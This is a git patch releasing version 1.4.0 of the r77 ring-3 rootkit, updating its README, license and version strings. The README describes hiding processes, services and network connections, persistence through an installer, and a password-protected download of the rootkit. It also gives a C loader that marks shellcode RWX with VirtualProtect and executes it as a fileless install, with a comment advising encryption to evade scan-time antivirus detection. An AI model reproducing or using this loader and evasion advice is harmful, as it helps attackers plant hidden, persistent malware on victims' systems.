From 0b3157ce7a56da9969be51513134bacf437b22e1 Mon Sep 17 00:00:00 2001 From: bytecode77 Date: Thu, 1 Sep 2022 08:26:25 +0200 Subject: [PATCH] 1.4.0 --- LICENSE.md | 2 +- README.md | 30 +++++++++++++++++++++++----- src/GlobalAssemblyInfo.cs | 6 +++--- vs/TestConsole/Views/AboutPopup.xaml | 2 +- 4 files changed, 30 insertions(+), 10 deletions(-) diff --git a/LICENSE.md b/LICENSE.md index ece26bb..42ff427 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,4 +1,4 @@ -Copyright (c) 2021, bytecode77 +Copyright (c) 2022, bytecode77 All rights reserved. Redistribution and use in source and binary forms, with or without diff --git a/README.md b/README.md index 55bc6c0..d45ecb5 100644 --- a/README.md +++ b/README.md @@ -11,8 +11,6 @@ r77 is a ring 3 Rootkit that hides following entities from all processes: - Services - TCP & UDP connections -It is compatible with Windows 7 and Windows 10 in both x64 and x86 editions. - ## Hiding by prefix All entities where the name starts with `"$77"` are hidden. @@ -25,16 +23,38 @@ The dynamic configuration system allows to hide processes by **PID** and by **na ![](https://bytecode77.com/images/pages/r77-rootkit/config.png) -The configuration is stored in `HKEY_LOCAL_MACHINE\SOFTWARE\$77config` and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user. +The configuration is located in `HKEY_LOCAL_MACHINE\SOFTWARE\$77config` and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user. The `$77config` key is hidden when RegEdit is injected with the rootkit. ## Installer -r77 is deployable using a single file `"Install.exe"`. It installs the r77 service that starts before the first user is logged on. This background process injects all currently running processes, as well as processes that spawn later. Two processes are needed to inject both 32-bit and 64-bit processes. Both processes are hidden by ID using the configuration system. +r77 is deployable using a single file `"Install.exe"`. The installer persists r77 and injects all currently running processes. `Uninstall.exe` removes r77 from the system and gracefully detaches the rootkit from all processes. +`Install.shellcode` is the shellcode equivalent of the installer. This way, the installer can be integrated without dropping `Install.exe`. It can simply be loaded into memory, casted to a function pointer, and executed: + +``` +int main() +{ + // 1. Load Install.shellcode from resources or from a BYTE[] + // Ideally, encrypt the file and decrypt it here to avoid scantime detection. + LPBYTE shellCode = ... + + // 2. Make the shellcode RWX. + DWORD oldProtect; + VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect); + + // 3. Cast the buffer to a function pointer and execute it. + ((void(*)())shellCode)(); + + // This is the fileless equivalent to executing Install.exe. + + return 0; +} +``` + ## Child process hooking When a process creates a child process, the new process is injected before it can run any of its own instructions. The function `NtResumeThread` is always called when a new process is created. Therefore, it's a suitable target to hook. Because a 32-bit process can spawn a 64-bit child process and vice versa, the r77 service provides a named pipe to handle child process injection requests. @@ -103,7 +123,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki ## Downloads -[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.3.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.3.0.zip) +[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.4.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.4.0.zip) (**ZIP Password:** bytecode77)
[![](https://bytecode77.com/public/fileicons/pdf.png) Technical Documentation](https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf) diff --git a/src/GlobalAssemblyInfo.cs b/src/GlobalAssemblyInfo.cs index 52ee8b2..6920bcf 100644 --- a/src/GlobalAssemblyInfo.cs +++ b/src/GlobalAssemblyInfo.cs @@ -1,8 +1,8 @@ using System.Reflection; -[assembly: AssemblyVersion("1.3.0")] -[assembly: AssemblyFileVersion("1.3.0")] -[assembly: AssemblyCopyright("© bytecode77, 2021.")] +[assembly: AssemblyVersion("1.4.0")] +[assembly: AssemblyFileVersion("1.4.0")] +[assembly: AssemblyCopyright("© bytecode77, 2022.")] namespace Global { diff --git a/vs/TestConsole/Views/AboutPopup.xaml b/vs/TestConsole/Views/AboutPopup.xaml index 6167a0c..fa30b67 100644 --- a/vs/TestConsole/Views/AboutPopup.xaml +++ b/vs/TestConsole/Views/AboutPopup.xaml @@ -32,7 +32,7 @@ - +